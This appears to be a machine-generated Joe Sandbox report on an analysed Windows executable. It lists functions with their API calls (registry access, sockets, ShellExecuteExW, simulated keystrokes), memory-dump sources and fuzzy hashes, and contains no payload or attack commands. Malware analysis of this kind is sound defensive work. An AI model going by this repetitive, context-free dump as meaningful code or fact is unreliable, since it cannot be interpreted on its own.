                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                                                                                                                                                      • Opcode ID: 09f861e29b4ba2454cd49c01511583a904461d8ab0b02db79fcdafead89c0919
                                                                                                                                                                                                                                                      • Instruction ID: 4dee98d5ace30f6574fa250fc8dccbb2591765942c2352c7fadf1fc29ad67a5f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09f861e29b4ba2454cd49c01511583a904461d8ab0b02db79fcdafead89c0919
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F0136F690020CBFE711A7949D89EFB776CD708305F004496BB45E2141EA74DE84AF71
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F22BF6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharConnectRegistryUpper
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2595220575-0
                                                                                                                                                                                                                                                      • Opcode ID: dc839ef0f7b1a1d8bc224f074b3716cc66617acc63d9f1efe2d45b3acdc1930e
                                                                                                                                                                                                                                                      • Instruction ID: 01165e13944c50cc4006f65212314d623ed92a7834ab199f8aab53df5cd20dae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc839ef0f7b1a1d8bc224f074b3716cc66617acc63d9f1efe2d45b3acdc1930e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0917971604211AFCB10EF58D981F6EB7E5FF98310F04881DF996972A2DB35E906EB42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • select.WSOCK32 ref: 00F19691
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F1969E
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00F196C8
                                                                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F196E9
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F196F8
                                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00F19765
                                                                                                                                                                                                                                                      • htons.WSOCK32(?), ref: 00F197AA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 500251541-0
                                                                                                                                                                                                                                                      • Opcode ID: f69690fad03d4b3e0777e95d552bccad6d41d8c5f5878f65460532c6fc8b61f5
                                                                                                                                                                                                                                                      • Instruction ID: 992d754a6dce1390eb23dd93bd3e3f4926e72eb5ea71fa3f065a6b1e73423991
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f69690fad03d4b3e0777e95d552bccad6d41d8c5f5878f65460532c6fc8b61f5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B171DD32508200ABC314EF64CC91FABB7E8EF85724F104A1DF555AB2A1EB71DD45DBA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __mtinitlocknum.LIBCMT ref: 00EEA991
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7D7C: __FF_MSGBANNER.LIBCMT ref: 00EE7D91
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7D7C: __NMSG_WRITE.LIBCMT ref: 00EE7D98
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7D7C: __malloc_crt.LIBCMT ref: 00EE7DB8
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EEA9A4
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EEA9F0
                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F76DE0,00000018,00EF5E7B,?,00000000,00000109), ref: 00EEAA0C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(8000000C,00F76DE0,00000018,00EF5E7B,?,00000000,00000109), ref: 00EEAA29
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 00EEAA39
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1422805418-0
                                                                                                                                                                                                                                                      • Opcode ID: 288dc8a348e3488628115e9d5a00d717b9786ae9b3ff2a787be49ee8644ae4ad
                                                                                                                                                                                                                                                      • Instruction ID: 7b52ebc22feb13265986589b0cc167c4f8462e60e9e024a13018451516575354
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 288dc8a348e3488628115e9d5a00d717b9786ae9b3ff2a787be49ee8644ae4ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6412C7190078D9BEB149F6AD9447ACB7F0AF01324F18933CE429BB2D1DB74A944CB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F28EE4
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00F28EEC
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F28EF7
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00F28F03
                                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F28F3F
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F28F50
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F2BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00F28F8A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F28FAA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                                      • Opcode ID: cb47af2687443e401602ec8f1701e0cbe0df0371d18c64489c6f2ea3017932fd
                                                                                                                                                                                                                                                      • Instruction ID: 5cbf8e4736343c829551919fa71944dd78c0b5dddb6a09b579226dd321ed4861
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb47af2687443e401602ec8f1701e0cbe0df0371d18c64489c6f2ea3017932fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72319F76201224BFEB108F50DC49FEA3BADEF5A765F054065FE089A191C6B59842DB70
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
                                                                                                                                                                                                                                                      • _wcstok.LIBCMT ref: 00F1184E
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F118DD
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F11910
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                                                                                                                                                      • Opcode ID: 2127e83307fbdbcf78b3b80175706a76378518447a0ce54847c4dae8aa5fd3a2
                                                                                                                                                                                                                                                      • Instruction ID: 797411992fb0531e09e83f6eca083b6a44553ff17c4ddd25c37412804236cab1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2127e83307fbdbcf78b3b80175706a76378518447a0ce54847c4dae8aa5fd3a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C18C315093409FC724EF64C995F9AB7E0BF85350F04492DF99AA72A2DB31EC46DB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00F3016D
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00F3038D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F303AB
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00F303D6
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F303FF
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00F30421
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F30440
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3356174886-0
                                                                                                                                                                                                                                                      • Opcode ID: 857e3c3d793ac685e9fb5e9b217d2171630fb1eb7214354bfeda9842a7454b4c
                                                                                                                                                                                                                                                      • Instruction ID: 0040ba720f760308306f07f96a9b91d2cca60f3378cd05bac87c0ece61ca1d1b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 857e3c3d793ac685e9fb5e9b217d2171630fb1eb7214354bfeda9842a7454b4c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EA1C235A00616EFDB18CF68C9957BEBBB1FF04720F048116EC54A7290DB34AD50EB90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 81b1f0dae7b8e00c7e0ccce5ecefc6edef7065b75c8eb8613fb36accd5da735e
                                                                                                                                                                                                                                                      • Instruction ID: 1a7b19de69562b56e86f17684eae9f654f3dd083abfcd05ef6d5ef9a6890d08a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b1f0dae7b8e00c7e0ccce5ecefc6edef7065b75c8eb8613fb36accd5da735e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A716DB1A00109EFCB14CF98CC49AAEBB75FF85314F14819AF915AB391C734AA42DF65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2225A
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F22323
                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00F22368
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F2242F
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00F2243E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 4082843840-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: d865a2a811f570567fcc395dc0627424821d1fca77d80d2caaa6a899e240159d
                                                                                                                                                                                                                                                      • Instruction ID: 72242b5bfea2219d852b277a725ba7f23bdf6779d873737ee9fddebae95a21c6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d865a2a811f570567fcc395dc0627424821d1fca77d80d2caaa6a899e240159d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3716C74900629AFCF04EF98D985A9EB7F5FF48310F108459E855BB391CB35AD41DB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00F03DE7
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F03DFC
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00F03E5D
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F03E8B
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F03EAA
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F03EF0
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F03F13
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                      • Opcode ID: b81c8d0eec1b684109f083cad7c6e161bfabd0bb63f28b92ac0a0c57ef17bec4
                                                                                                                                                                                                                                                      • Instruction ID: 5b8c7935f1f2f54349e1ff4ff4f08e0dfafebcb2aeb591450b9402df7d0c9344
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b81c8d0eec1b684109f083cad7c6e161bfabd0bb63f28b92ac0a0c57ef17bec4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F51C2A0E047D63DFB364324CC55BB67EAD5B06314F088589E1D9468D2D3A8AEC8F760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 00F03C02
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F03C17
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00F03C78
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F03CA4
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F03CC1
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F03D05
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F03D26
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                      • Opcode ID: 9086e4955c231659da9c3196717016d01c2c49df5f195c86b2c2e72ca5dcea4d
                                                                                                                                                                                                                                                      • Instruction ID: a23be0fa524773b35a3a2c81d498c2b67e98481539d5dffcb6e25f5828b19ee8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9086e4955c231659da9c3196717016d01c2c49df5f195c86b2c2e72ca5dcea4d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 525107A0A447D93DFB3283348C45BB6BFAD6B06314F0C8489E5D59A8C2D694EE84F760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2945705084-0
                                                                                                                                                                                                                                                      • Opcode ID: 9848e403a11adf3a78c2f5b6ca5b389059e4ad275e83f3671eda0e74e8a83f99
                                                                                                                                                                                                                                                      • Instruction ID: cdaa0cf93f605e50c4923fa33140b8ebd829b474e466080e0c6c91fd81d50c45
